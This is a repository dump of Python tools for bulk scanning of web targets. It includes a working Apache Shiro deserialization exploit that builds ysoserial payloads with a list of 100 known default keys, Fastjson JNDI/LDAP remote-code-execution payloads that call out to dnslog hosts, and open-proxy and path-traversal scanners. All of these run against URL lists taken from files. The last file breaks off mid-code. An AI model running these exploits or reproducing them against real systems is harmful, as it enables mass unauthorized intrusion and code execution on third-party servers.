├── README.md ├── chexkproxy.py ├── dirvuln.py ├── fastjson_rce.py ├── fofa_favicon.py ├── infoweak.py ├── mac安装.md ├── proxy_vul.py ├── push.py ├── shiro_100key.txt ├── shiro_scan.py ├── spfcheck.py └── spider_v3.py /README.md: -------------------------------------------------------------------------------- 1 | # scan 2 | 3 | ## 需要请Star 4 | 5 | ### [apache shiro 反序列化批量扫描脚本 shiroscan ](https://github.com/Stu2014/scan/blob/master/shiro_scan.py) 6 | ``` 7 | python shiro_scan.py -h 8 | usage: scan.py [optional] 9 | 10 | Apache Shiro Scanner.By Stu. 11 | 12 | optional arguments: 13 | -h, --help show this help message and exit 14 | -f File Put Web url in url.txt 15 | -u Url Put a Web url 16 | -t THREADS Num of scan threads,default 10 17 | 18 | ``` 19 | ### [批量爬虫脚本](https://github.com/Stu2014/scan/blob/master/spider_v3.py) 20 | 21 | ``` 22 | python spider_v3.py domain.txt 23 | ``` 24 | ### [批量扫描代理脚本](https://github.com/Stu2014/scan/blob/master/proxy_vul.py) 25 | 26 | ``` 27 | python proxy_vul.py domain.txt 28 | ``` 29 | ### [批量扫描fastjson脚本](https://github.com/Stu2014/scan/blob/master/fastjson_rce.py) 30 | 31 | ### [spf检测脚本](https://github.com/Stu2014/scan/blob/master/spfcheck.py) 32 | 33 | ### [钉钉和server酱推送脚本](https://github.com/Stu2014/scan/blob/master/push.py) 34 | 35 | ### [目录穿越扫描](https://github.com/Stu2014/scan/blob/master/dirvuln.py) 36 | 37 | -------------------------------------------------------------------------------- /chexkproxy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2021/3/30 10:18 上午 4 | # @Author : Pickmea. 5 | # @Email : h4ckst5@qq.com 6 | # @File : temppro.py.py 7 | 8 | import requests 9 | import random 10 | import queue 11 | import warnings,sys 12 | from threading import Thread 13 | from urllib.parse import urlparse 14 | warnings.filterwarnings("ignore") 15 | 16 | httpQueue = queue.Queue() 17 | 18 | def get_url(site): 19 | while True: 20 | try: 21 | hosts = httpQueue.get(timeout=0.1) 22 | except: 23 | break 24 | try: 25 | host = hosts[0] 26 | port = hosts[1] 27 | proxies_http = { 28 | "http": "http://{}:{}".format(host, port), 29 | "https": "https://{}:{}".format(host, port), 30 | } 31 | 32 | # res = requests.get("http://httpbin.org/ip", proxies=proxies_http, timeout=5, verify=False).text 33 | response = requests.get(site, proxies=proxies_http, timeout=5, verify=False).text 34 | print("try {}{}".format(site,proxies_http)) 35 | if 'check that this domai' in response: 36 | print(response, '----', host) 37 | except Exception as e: 38 | # print(e) 39 | pass 40 | 41 | 42 | def get_host_port(filename, site): 43 | for x in open(filename,'r'): 44 | url = x.strip().split(':') 45 | port = url[1] 46 | host = url[0] 47 | # print(host,port) 48 | httpQueue.put([host, port]) 49 | proxy_threads = [] 50 | for x in range(30): 51 | p = Thread(target=get_url, args=(site,)) 52 | proxy_threads.append(p) 53 | p.start() 54 | 55 | for p in proxy_threads: 56 | p.join() 57 | 58 | # http 59 | def addhttp(x): 60 | if x.find('http') >= 0: 61 | pass 62 | else: 63 | x = 'http://' + x + '/' 64 | return x 65 | 66 | if __name__ == '__main__': 67 | # filename = sys.argv[1]#存在http协议 68 | filename = '1.txt'#代理地址 格式127.0.0.1:8080 69 | sites = '2.txt'# 访问的地址 baidu.com 70 | for x in open(sites, 'r'): 71 | site = addhttp(x.strip()) 72 | get_host_port(filename, site) 73 | -------------------------------------------------------------------------------- /dirvuln.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2020/8/19 下午1:55 4 | # @Author : Stu. 5 | # @Email : h4ckst5@qq.com 6 | # @des : 目录穿越扫描 7 | # @File : travelvuln_check.py 8 | import queue, requests 9 | from threading import Thread 10 | import sys 11 | import warnings 12 | warnings.filterwarnings("ignore") 13 | 14 | all_que = queue.Queue() 15 | def scan_tral(): 16 | while True: 17 | try: 18 | testurl = all_que.get(timeout=0.1) 19 | except: 20 | break 21 | # print("testing", testurl) 22 | try: 23 | res1 = requests.get(testurl+'/qpalzmqpalzm.js',timeout=10,verify=False) 24 | res2 = requests.get(testurl+'/a/..;/..;/', timeout=10,verify=False) 25 | code1 = res1.status_code 26 | code2 = res2.status_code 27 | if code1 == 404 and code2 == 400: 28 | with open("result.txt", 'a') as f: 29 | f.write("[travel vulned]"+testurl+'\n') 30 | print("travel vulned", testurl) 31 | except Exception as e: 32 | print(e) 33 | pass 34 | 35 | def start_mul(file): 36 | 37 | for x in open(file): 38 | x = x.strip() 39 | if x.find('http') >= 0: 40 | pass 41 | else: 42 | x = 'https://' + x.strip() + '/' 43 | all_que.put(x) 44 | urlth = [] 45 | for x in range(30): 46 | p = Thread(target=scan_tral) 47 | urlth.append(p) 48 | p.start() 49 | 50 | for paa in urlth: 51 | paa.join() 52 | # file = sys.argv[1] 53 | if __name__ == '__main__': 54 | filename = sys.argv[1] 55 | start_mul(filename) 56 | 57 | 58 | -------------------------------------------------------------------------------- /fastjson_rce.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | 4 | """ 5 | code by: Stu. 6 | 公众号:安全黑板报 7 | """ 8 | import json 9 | import random 10 | import requests 11 | import time,Queue 12 | import argparse,sys 13 | import threading 14 | 15 | vuln_count = 0 16 | payload =['{"type":0,"pageSize":3,"pageNo":1,"a":"%s"}'] 17 | 18 | 19 | payload.append('{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://%s.dnslog.cn/Exploit","autoCommit":"true"}') 20 | payload.append('{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://%s..dnslog.link/Exploit"}}') 21 | payload.append('{"@type":"Lcom.sun.rowset.RowSetImpl;","dataSourceName":"ldap://%s..dnslog.link/Exploit","autoCommit":"true"}') 22 | payload.append('{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'+'"dataSourceName":"ldap://%s..dnslog.link/Exploit","autoCommit":"true"}}') 23 | 24 | 25 | 26 | def checkvuln(): 27 | global vuln_count 28 | while True: 29 | try: 30 | web_url = queue.get(timeout=0.1) 31 | except: 32 | break 33 | try: 34 | for x in range(len(payload)): 35 | random_str_ = random_str(8) 36 | data = payload[x] % random_str_ 37 | res = requests.post(url=web_url,data=data,timeout=1.5) 38 | result = getdnslog(random_str_) 39 | if result == "True": 40 | print "[+200] vuln fastjson rce",web_url,"\n payload:",data 41 | vuln_count+=1 42 | break 43 | else: 44 | pass 45 | except Exception,e: 46 | result = getdnslog(random_str_) 47 | if result == "True": 48 | print "[+200] vuln fastjson rce",web_url,"\n payload:",data 49 | vuln_count+=1 50 | break 51 | else: 52 | pass 53 | 54 | #查看dnslog状态 55 | def getdnslog(random_str): 56 | dns_check = "https://admin.dnslog.link/api/dns//%s/" % random_str#token 替换为http://admin.dnslog.link平台字符串 57 | res = requests.get(dns_check) 58 | return res.text.strip() 59 | 60 | #取得随机数 61 | def random_str(len): 62 | str1 = "" 63 | for i in range(len): 64 | str1 += (random.choice("QWERTYUIOPASDFGHJKLZXCVBNM1234567890")) 65 | return str(str1) 66 | 67 | 68 | if __name__ == "__main__": 69 | parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter, 70 | description="Fastjson Rce.By Stu.", 71 | usage="scan.py [optional]") 72 | parser.add_argument("-f",metavar="File",type=str,default="url.txt",help="Put Web url in url.txt") 73 | parser.add_argument("-u",metavar="Url",type=str,help="Put a Web url") 74 | parser.add_argument("-t",metavar="THREADS",type=int,default="10",help="Num of scan threads,default 10") 75 | 76 | if len(sys.argv)==1: 77 | sys.argv.append("-h") 78 | args = parser.parse_args() 79 | start_time = time.time() 80 | if args.u is None: 81 | #将url放入队列 82 | queue = Queue.Queue() 83 | for web_url in open(args.f).xreadlines(): 84 | web_url = web_url.strip() 85 | if web_url.find("http") >= 0: 86 | pass 87 | else: 88 | web_url = "http://"+web_url 89 | if not web_url: 90 | continue 91 | queue.put(web_url) 92 | 93 | #开启多线程访问 94 | threads = [] 95 | for i in range(args.t): 96 | t = threading.Thread(target=checkvuln) 97 | threads.append(t) 98 | t.start() 99 | 100 | for t in threads: 101 | t.join() 102 | else: 103 | queue = Queue.Queue() 104 | web_url = (args.u).strip() 105 | if web_url.find("http") >= 0: 106 | pass 107 | else: 108 | web_url = "http://"+web_url 109 | queue.put(web_url) 110 | checkvuln() 111 | print ("[+]Done. scanned %s available %.1f seconds." % (vuln_count,time.time() - start_time)) 112 | 113 | -------------------------------------------------------------------------------- /fofa_favicon.py: -------------------------------------------------------------------------------- 1 | import mmh3 2 | import requests 3 | 4 | response = requests.get('http://baidu.co/favicon.ico') 5 | favicon = response.content.encode('base64') 6 | hash = mmh3.hash(favicon) 7 | print hash 8 | ''' 9 | http.favicon.hash:11111 10 | '''' 11 | -------------------------------------------------------------------------------- /infoweak.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2021/1/25 4:36 下午 4 | # @Author : Pickmea. 5 | # @Email : h4ckst5@qq.com 6 | # @File : infoweak.py 7 | 8 | # 信息扫描 9 | import queue 10 | from urllib.parse import urlparse 11 | from threading import Thread 12 | import HackRequests 13 | import warnings 14 | warnings.filterwarnings("ignore") 15 | 16 | all_que = queue.Queue() 17 | hack = HackRequests.hackRequests() 18 | 19 | def scan_tral(): 20 | while True: 21 | try: 22 | testurl = all_que.get(timeout=0.1).strip('\r').strip('\n') 23 | except: 24 | break 25 | try: 26 | if testurl.endswith('/'): 27 | pass 28 | else: 29 | testurl += '/' 30 | xx = urlparse(testurl).netloc 31 | # print(host) 32 | raw = ''' 33 | GET / HTTP/1.1 34 | Host: {} 35 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0 36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 37 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 38 | Accept-Encoding: gzip, deflate 39 | Connection: close 40 | Referer: {} 41 | ''' .format(xx, testurl) 42 | # print(raw) 43 | hh = hack.httpraw(raw) 44 | res = (hh.log['response']) 45 | # if hh.status_code != 302 and hh.status_code != 404 and hh.status_code != 200 and hh.status_code != 301: 46 | # print("code error: ", testurl, "\n", hh.log, "\n", hh.status_code) 47 | if res.find('Illegal character') >= 1: 48 | print("[vuln:]",testurl) 49 | except Exception as e: 50 | # print(e) 51 | pass 52 | 53 | def start_mul(file): 54 | for x in open(file): 55 | x = x.strip() 56 | if x.find('http') >= 0: 57 | pass 58 | else: 59 | x = 'https://' + x.strip() + '/' 60 | all_que.put(x) 61 | urlth = [] 62 | for x in range(30): 63 | p = Thread(target=scan_tral) 64 | urlth.append(p) 65 | p.start() 66 | 67 | for paa in urlth: 68 | paa.join() 69 | # file = sys.argv[1] 70 | if __name__ == '__main__': 71 | filename = sys.argv[1] 72 | # filename = 'http_url.txt' 73 | start_mul(filename) 74 | -------------------------------------------------------------------------------- /mac安装.md: -------------------------------------------------------------------------------- 1 | mac 安装 2 | ``` 3 | https://github.com/yanxiu0614/subdomain3.git 4 | burp 5 | sqlmap 6 | nmap 7 | 8 | 9 | 微信 10 | google chrome 11 | 钉钉 12 | xnip 13 | shuttle 14 | telegram desktop 15 | the unarchiver 16 | tencent lemon lite 17 | openinterminal lite 18 | sublime text 3 19 | 安装rdm可视化工具https://pan.baidu.com/s/10vpdhw7YfDD7G4yZCGtqQg 20 | ``` 21 | -------------------------------------------------------------------------------- /proxy_vul.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2020/9/16 4:48 下午 4 | # @Author : Stu. 5 | # @Email : h4ckst5@qq.com 6 | # @File : http_proxy_vuln.py 7 | # 扫描代理模块 8 | 9 | import requests 10 | import random 11 | import queue 12 | import warnings,sys 13 | from threading import Thread 14 | from urllib.parse import urlparse 15 | warnings.filterwarnings("ignore") 16 | 17 | httpQueue = queue.Queue() 18 | 19 | def get_url(): 20 | while True: 21 | try: 22 | hosts = httpQueue.get(timeout=0.1) 23 | except: 24 | break 25 | host = hosts[0] 26 | port = hosts[1] or 80 27 | proxies_http = { 28 | "http": "http://{}:{}".format(host, port), 29 | "https": "https://{}:{}".format(host, port), 30 | } 31 | # print(host+str(port)+'\n') 32 | random_str_ = random_str(8) 33 | try: 34 | response = requests.get("https://"+str(host)+'.'+str(port)+'.'+random_str_+".f4c8e390.dnslog.link/", proxies=proxies_http, timeout=5, verify=False) 35 | if getdnslog(random_str_) == "True": 36 | print("[200] {}:{} {}".format(host, port, random_str_)) 37 | with open("result.txt", 'a') as f: 38 | f.write("[http-proxy]"+host+':'+str(port)+' '+random_str_+'\n') 39 | except Exception as e: 40 | print(e) 41 | pass 42 | 43 | # 查看dnslog状态 44 | def getdnslog(random_str): 45 | dns_check = "https://admin.dnslog.link/api/web/f4c8e390/%s/" % random_str # token 替换为http://admin.dnslog.link平台字符串 46 | res = requests.get(dns_check, timeout=5, verify=False) 47 | return res.text.strip() 48 | 49 | # 取得随机数 50 | def random_str(len): 51 | str1 = "" 52 | for i in range(len): 53 | str1 += (random.choice("QWERTYUIOPASDFGHJKLZXCVBNM1234567890")) 54 | return str(str1) 55 | 56 | def get_host_port(filename): 57 | for x in open(filename,'r'): 58 | url = x.strip() 59 | port = urlparse(url).port 60 | host = urlparse(url).hostname 61 | httpQueue.put([host, port]) 62 | proxy_threads = [] 63 | for x in range(30): 64 | p = Thread(target=get_url) 65 | proxy_threads.append(p) 66 | p.start() 67 | 68 | for p in proxy_threads: 69 | p.join() 70 | if __name__ == '__main__': 71 | filename = sys.argv[1]#存在http协议 72 | get_host_port(filename) 73 | 74 | -------------------------------------------------------------------------------- /push.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2020/6/27 下午3:33 4 | # @Author : Stu. 5 | # @File : push.py 6 | import json 7 | import requests 8 | 9 | 10 | # 钉钉推送,token添加关键字,扫描、vuln 11 | def push_dingding(dingtoken, jobstatus=None, vul_type=None, job_url=None, vuln_url=None, test=None): 12 | if dingtoken: 13 | headers = {"Content-Type": "application/json"} 14 | dingtoken_url = "https://oapi.dingtalk.com/robot/send?access_token=" + dingtoken; 15 | 16 | if test == 1: 17 | ding_json = { 18 | "msgtype": "text", 19 | "text": { 20 | "content": "测试扫描器推送token可用" 21 | } 22 | } 23 | elif jobstatus == 1 and job_url: 24 | ding_json = { 25 | "msgtype": "text", 26 | "text": { 27 | "content": "%s 域名端口扫描任务完成 ,请及时查看" % job_url 28 | } 29 | } 30 | elif vuln_url and vul_type: 31 | ding_json = { 32 | "msgtype": "text", 33 | "text": { 34 | "content": "[vuln find] vuln type: %s ,vuln url: %s" % (vul_type, vuln_url) 35 | } 36 | } 37 | try: 38 | res = requests.post(url=dingtoken_url, data=json.dumps(ding_json), headers=headers) 39 | except Exception as e: 40 | print("钉钉推送错误:", e) 41 | pass 42 | else: 43 | pass 44 | 45 | 46 | # 微信server酱推送 访问http://sc.ftqq.com/3.version获取secret 47 | def push_wx(secret, jobstatus=None, vul_type=None, job_url=None, vuln_url=None, test=None): 48 | if secret: 49 | wx_url = "http://sc.ftqq.com/" + secret + ".send";print(wx_url) 50 | 51 | if test == 1: 52 | wx_json = { 53 | "text": "扫描器测试微信推送", 54 | "desp": "扫描器测试微信推送正文" 55 | } 56 | elif jobstatus == 1 and job_url: 57 | wx_json = { 58 | "text": "扫描任务完成", 59 | "desp": "%s 域名端口扫描任务完成 ,请及时查看" % job_url 60 | } 61 | elif vuln_url and vul_type: 62 | wx_json = { 63 | "text": "漏洞报告", 64 | "desp": "[vuln find] vuln type: %s ,vuln url: %s" % (vul_type, vuln_url) 65 | } 66 | try: 67 | res = requests.post(url=wx_url, data=wx_json) 68 | print(res.text) 69 | except Exception as e: 70 | print("微信推送错误:", e) 71 | pass 72 | else: 73 | pass 74 | 75 | 76 | if __name__ == '__main__': 77 | dingtoken = "" 78 | secret = "" 79 | # 钉钉推送,token添加关键字,扫描、vuln 80 | # 测试是否可用 传入token,test=1 81 | push_dingding(dingtoken, test=1) 82 | 83 | # 扫描任务完成 传入dingtoken,jobstatus,job_url 84 | push_dingding(dingtoken=dingtoken, jobstatus=1, job_url="http://baidu.com") 85 | 86 | # 扫描发现漏洞,传入dingtoken,vul_type,vuln_url 87 | push_dingding(dingtoken, vul_type="sqlinjection", vuln_url="http://baidu.com") 88 | 89 | # 微信推送 90 | push_wx(secret=secret, test=1) 91 | push_wx(secret=secret, jobstatus=1, job_url="http://baidu.com") 92 | push_wx(secret=secret, vul_type="sqlinjection", vuln_url="http://baidu.com") 93 | -------------------------------------------------------------------------------- /shiro_100key.txt: -------------------------------------------------------------------------------- 1 | kPH+bIxk5D2deZiIxcaaaA== 2 | 4AvVhmFLUs0KTA3Kprsdag== 3 | Z3VucwAAAAAAAAAAAAAAAA== 4 | fCq+/xW488hMTCD+cmJ3aQ== 5 | 0AvVhmFLUs0KTA3Kprsdag== 6 | 1AvVhdsgUs0FSA3SDFAdag== 7 | 1QWLxg+NYmxraMoxAXu/Iw== 8 | 25BsmdYwjnfcWmnhAciDDg== 9 | 2AvVhdsgUs0FSA3SDFAdag== 10 | 3AvVhmFLUs0KTA3Kprsdag== 11 | 3JvYhmBLUs0ETA5Kprsdag== 12 | r0e3c16IdVkouZgk1TKVMg== 13 | 5aaC5qKm5oqA5pyvAAAAAA== 14 | 5AvVhmFLUs0KTA3Kprsdag== 15 | 6AvVhmFLUs0KTA3Kprsdag== 16 | 6NfXkC7YVCV5DASIrEm1Rg== 17 | 6ZmI6I2j5Y+R5aSn5ZOlAA== 18 | cmVtZW1iZXJNZQAAAAAAAA== 19 | 7AvVhmFLUs0KTA3Kprsdag== 20 | 8AvVhmFLUs0KTA3Kprsdag== 21 | 8BvVhmFLUs0KTA3Kprsdag== 22 | 9AvVhmFLUs0KTA3Kprsdag== 23 | OUHYQzxQ/W9e/UjiAGu6rg== 24 | a3dvbmcAAAAAAAAAAAAAAA== 25 | aU1pcmFjbGVpTWlyYWNsZQ== 26 | bWljcm9zAAAAAAAAAAAAAA== 27 | bWluZS1hc3NldC1rZXk6QQ== 28 | bXRvbnMAAAAAAAAAAAAAAA== 29 | ZUdsaGJuSmxibVI2ZHc9PQ== 30 | wGiHplamyXlVB11UXWol8g== 31 | U3ByaW5nQmxhZGUAAAAAAA== 32 | MTIzNDU2Nzg5MGFiY2RlZg== 33 | L7RioUULEFhRyxM7a2R/Yg== 34 | a2VlcE9uR29pbmdBbmRGaQ== 35 | WcfHGU25gNnTxTlmJMeSpw== 36 | OY//C4rhfwNxCQAQCrQQ1Q== 37 | 5J7bIJIV0LQSN3c9LPitBQ== 38 | f/SY5TIve5WWzT4aQlABJA== 39 | bya2HkYo57u6fWh5theAWw== 40 | WuB+y2gcHRnY2Lg9+Aqmqg== 41 | kPv59vyqzj00x11LXJZTjJ2UHW48jzHN 42 | 3qDVdLawoIr1xFd6ietnwg== 43 | ZWvohmPdUsAWT3=KpPqda 44 | YI1+nBV//m7ELrIyDHm6DQ== 45 | 6Zm+6I2j5Y+R5aS+5ZOlAA== 46 | 2A2V+RFLUs+eTA3Kpr+dag== 47 | 6ZmI6I2j3Y+R1aSn5BOlAA== 48 | SkZpbmFsQmxhZGUAAAAAAA== 49 | 2cVtiE83c4lIrELJwKGJUw== 50 | fsHspZw/92PrS3XrPW+vxw== 51 | XTx6CKLo/SdSgub+OPHSrw== 52 | sHdIjUN6tzhl8xZMG3ULCQ== 53 | O4pdf+7e+mZe8NyxMTPJmQ== 54 | HWrBltGvEZc14h9VpMvZWw== 55 | rPNqM6uKFCyaL10AK51UkQ== 56 | Y1JxNSPXVwMkyvES/kJGeQ== 57 | lT2UvDUmQwewm6mMoiw4Ig== 58 | MPdCMZ9urzEA50JDlDYYDg== 59 | xVmmoltfpb8tTceuT5R7Bw== 60 | c+3hFGPjbgzGdrC+MHgoRQ== 61 | ClLk69oNcA3m+s0jIMIkpg== 62 | Bf7MfkNR0axGGptozrebag== 63 | 1tC/xrDYs8ey+sa3emtiYw== 64 | ZmFsYWRvLnh5ei5zaGlybw== 65 | cGhyYWNrY3RmREUhfiMkZA== 66 | IduElDUpDDXE677ZkhhKnQ== 67 | yeAAo1E8BOeAYfBlm4NG9Q== 68 | cGljYXMAAAAAAAAAAAAAAA== 69 | 2itfW92XazYRi5ltW0M2yA== 70 | XgGkgqGqYrix9lI6vxcrRw== 71 | ertVhmFLUs0KTA3Kprsdag== 72 | 5AvVhmFLUS0ATA4Kprsdag== 73 | s0KTA3mFLUprK4AvVhsdag== 74 | hBlzKg78ajaZuTE0VLzDDg== 75 | 9FvVhtFLUs0KnA3Kprsdyg== 76 | d2ViUmVtZW1iZXJNZUtleQ== 77 | yNeUgSzL/CfiWw1GALg6Ag== 78 | NGk/3cQ6F5/UNPRh8LpMIg== 79 | 4BvVhmFLUs0KTA3Kprsdag== 80 | MzVeSkYyWTI2OFVLZjRzZg== 81 | CrownKey==a12d/dakdad 82 | empodDEyMwAAAAAAAAAAAA== 83 | A7UzJgh1+EWj5oBFi+mSgw== 84 | YTM0NZomIzI2OTsmIzM0NTueYQ== 85 | c2hpcm9fYmF0aXMzMgAAAA== 86 | i45FVt72K2kLgvFrJtoZRw== 87 | U3BAbW5nQmxhZGUAAAAAAA== 88 | ZnJlc2h6Y24xMjM0NTY3OA== 89 | Jt3C93kMR9D5e8QzwfsiMw== 90 | MTIzNDU2NzgxMjM0NTY3OA== 91 | vXP33AonIp9bFwGl7aT7rA== 92 | V2hhdCBUaGUgSGVsbAAAAA== 93 | Z3h6eWd4enklMjElMjElMjE= 94 | Q01TX0JGTFlLRVlfMjAxOQ== 95 | ZAvph3dsQs0FSL3SDFAdag== 96 | Is9zJ3pzNh2cgTHB4ua3+Q== 97 | NsZXjXVklWPZwOfkvk6kUA== 98 | GAevYnznvgNCURavBhCr1w== 99 | 66v1O8keKNV3TTcGPK1wzg== 100 | SDKOLKn2J1j/2BHjeZwAoQ== -------------------------------------------------------------------------------- /shiro_scan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | 4 | ''' 5 | code by: Stu. 6 | 公众号:安全黑板报 7 | ''' 8 | 9 | import os 10 | import re 11 | import base64 12 | import uuid,time 13 | import subprocess 14 | import requests,sys 15 | from Crypto.Cipher import AES 16 | import random,argparse,Queue,threading 17 | import warnings 18 | 19 | 20 | warnings.filterwarnings("ignore") 21 | JAR_FILE = './ysoserial-0.0.6-SNAPSHOT-all.jar' 22 | scan_count = 0 23 | vuln_count = 0 24 | 25 | def poc(url, rce_command,key_): 26 | if '://' not in url: 27 | target = 'https://%s' % url if ':443' in url else 'http://%s' % url 28 | else: 29 | target = url 30 | try: 31 | payload = generator(rce_command, JAR_FILE,key_) # 生成payload 32 | r = requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10,verify=False) # 发送验证请求 33 | # print r.text 34 | except Exception, e: 35 | return True 36 | return True 37 | 38 | 39 | def generator(command, fp,key_): 40 | if not os.path.exists(fp): 41 | raise Exception('jar file not found!') 42 | popen = subprocess.Popen(['java', '-jar', fp, 'JRMPClient', command], 43 | stdout=subprocess.PIPE) 44 | BS = AES.block_size 45 | pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() 46 | mode = AES.MODE_CBC 47 | iv = uuid.uuid4().bytes 48 | encryptor = AES.new(base64.b64decode(key_), mode, iv) 49 | file_body = pad(popen.stdout.read()) 50 | base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) 51 | return base64_ciphertext 52 | 53 | #取得随机数 54 | def random_str(len): 55 | str1 = "" 56 | for i in range(len): 57 | str1 += (random.choice("QWERTYUIOPASDFGHJKLZXCVBNM1234567890")) 58 | return str(str1) 59 | 60 | #查看dnslog状态 61 | def getdnslog(random_str): 62 | dns_check = 'https://admin.dnslog.link/api/dns/token/%s/' % random_str#token 替换为http://admin.dnslog.link平台字符串 63 | res = requests.get(dns_check) 64 | return res.text.strip() 65 | 66 | #检查是否执行dnslog成功 67 | def check_vuln(): 68 | key = { 69 | 'kPH+bIxk5D2deZiIxcaaaA==', 70 | 'wGiHplamyXlVB11UXWol8g==', 71 | '2AvVhdsgUs0FSA3SDFAdag==', 72 | '4AvVhmFLUs0KTA3Kprsdag==', 73 | 'fCq+/xW488hMTCD+cmJ3aQ==', 74 | '3AvVhmFLUs0KTA3Kprsdag==', 75 | '1QWLxg+NYmxraMoxAXu/Iw==', 76 | 'ZUdsaGJuSmxibVI2ZHc9PQ==', 77 | 'Z3VucwAAAAAAAAAAAAAAAA==', 78 | 'U3ByaW5nQmxhZGUAAAAAAA==', 79 | 'wGiHplamyXlVB11UXWol8g==', 80 | '6ZmI6I2j5Y+R5aSn5ZOlAA==' 81 | } 82 | global scan_count,vuln_count 83 | while True: 84 | try : 85 | web_url = queue.get(timeout=0.1) 86 | scan_count+=1 87 | except: 88 | break 89 | try: 90 | 91 | for key_ in key: 92 | random_str_ = random_str(8) 93 | connect = poc(web_url,random_str_+".token.dnslog.link",key_)#token 替换为http://admin.dnslog.link平台字符串 94 | if connect == False: 95 | break 96 | result = getdnslog(random_str_) 97 | # print result,random_str_,key_ 98 | if result == 'True': 99 | print "[+200] vuln apache shiro",web_url,key_ 100 | vuln_count+=1 101 | break 102 | else: 103 | pass 104 | except Exception,e: 105 | pass 106 | 107 | if __name__ == '__main__': 108 | parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter, 109 | description='Apache Shiro Scanner.By Stu.', 110 | usage='scan.py [optional]') 111 | parser.add_argument('-f',metavar='File',type=str,default='url.txt',help='Put Web url in url.txt') 112 | parser.add_argument('-u',metavar='Url',type=str,help='Put a Web url') 113 | parser.add_argument('-t',metavar='THREADS',type=int,default='10',help='Num of scan threads,default 10') 114 | 115 | if len(sys.argv)==1: 116 | sys.argv.append('-h') 117 | args = parser.parse_args() 118 | start_time = time.time() 119 | if args.u is None: 120 | #将url放入队列 121 | queue = Queue.Queue() 122 | for web_url in open(args.f).xreadlines(): 123 | web_url = web_url.strip() 124 | if not web_url: 125 | continue 126 | queue.put(web_url) 127 | 128 | #开启多线程访问 129 | threads = [] 130 | for i in range(args.t): 131 | t = threading.Thread(target=check_vuln) 132 | threads.append(t) 133 | t.start() 134 | 135 | for t in threads: 136 | t.join() 137 | else: 138 | queue = Queue.Queue() 139 | queue.put(args.u) 140 | check_vuln() 141 | print ('[+]Done. %s weburl scanned %s available %.1f seconds.' % (scan_count,vuln_count,time.time() - start_time)) 142 | 143 | -------------------------------------------------------------------------------- /spfcheck.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | import dns.resolver 3 | import requests,json,sys 4 | import argparse 5 | 6 | vuldomain="" 7 | #token 配置关键字spf 8 | tokenurl="https://oapi.dingtalk.com/robot/send?access_token=" 9 | headers ={"Content-Type": "application/json"} 10 | 11 | #检测是否配置spf 12 | def check_vul(url): 13 | global vuldomain 14 | try: 15 | A = str(dns.resolver.query(url,"txt").response) 16 | if A.find("v=spf") >= 0: 17 | pass 18 | else: 19 | vuldomain+=url+"\n" 20 | # print(vuldomain) 21 | return True 22 | except dns.resolver.NoAnswer: 23 | vuldomain+=url+"\n" 24 | return True 25 | except dns.exception.Timeout: 26 | return False 27 | except: 28 | return False 29 | 30 | 31 | #提醒 32 | def sendresult(vuldomain): 33 | # vuldomain 34 | ding={ 35 | "msgtype": "text", 36 | "text": { 37 | "content": "以下spf未配置,请检查!\n%s" % vuldomain 38 | } 39 | } 40 | try: 41 | res=requests.post(url=tokenurl,data=json.dumps(ding),headers=headers) 42 | except: 43 | pass 44 | 45 | 46 | if __name__ == '__main__': 47 | parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter, 48 | description='SPF NOT SET Scanner.By Stu.', 49 | usage='spfcheck.py [optional]') 50 | parser.add_argument('-f',metavar='File',type=str,default='url.txt',help='Put Web url in url.txt') 51 | parser.add_argument('-u',metavar='Url',type=str,help='Put a Web url') 52 | 53 | if len(sys.argv) == 1: 54 | sys.argv.append('-h') 55 | args = parser.parse_args() 56 | if args.u is None: 57 | for url in open(args.f) : 58 | check_vul(url.strip()) 59 | else: 60 | check_vul(args.u) 61 | if vuldomain.strip() != '': 62 | sendresult(vuldomain) 63 | -------------------------------------------------------------------------------- /spider_v3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # @Time : 18/4/14 上午2:07 4 | # @Author : SecPlus 5 | # @Site : www.SecPlus.org 6 | # @Email : TideSecPlus@gmail.com 7 | 8 | # 2018.04.14 结合wdscan和其他爬虫,相对比较完善的spider 9 | 10 | import random 11 | import urllib2,re,requests 12 | import time,os 13 | 14 | import sys 15 | 16 | 17 | def url_protocol(url): 18 | domain = re.findall(r'.*(?=://)', url) 19 | if domain: 20 | return domain[0] 21 | else: 22 | return url 23 | 24 | def same_url(urlprotocol,url): 25 | url = url.replace(urlprotocol + '://', '') 26 | if re.findall(r'^www', url) == []: 27 | sameurl = 'www.' + url 28 | if sameurl.find('/') != -1: 29 | sameurl = re.findall(r'(?<=www.).*?(?=/)', sameurl)[0] 30 | else: 31 | sameurl = sameurl + '/' 32 | sameurl = re.findall(r'(?<=www.).*?(?=/)', sameurl)[0] 33 | else: 34 | if 